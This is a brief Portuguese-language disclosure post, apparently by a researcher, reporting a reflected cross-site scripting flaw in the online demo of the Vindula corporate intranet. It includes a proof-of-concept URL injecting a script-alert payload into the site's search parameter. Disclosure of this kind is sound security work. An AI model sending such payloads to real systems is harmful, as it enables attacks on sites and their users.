Disclosure: XSS Reflect (firebitsbr) – Vindula – intranet corporativa

Descobri um Disclosure: XSS Reflect – Vindula – intranet corporativa na versão demo on-line http://demo.vindula.com.br/

 

XSS Reflect

http://demo.vindula.com.br/@@search?SearchableText=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

twitter
@firebitsbr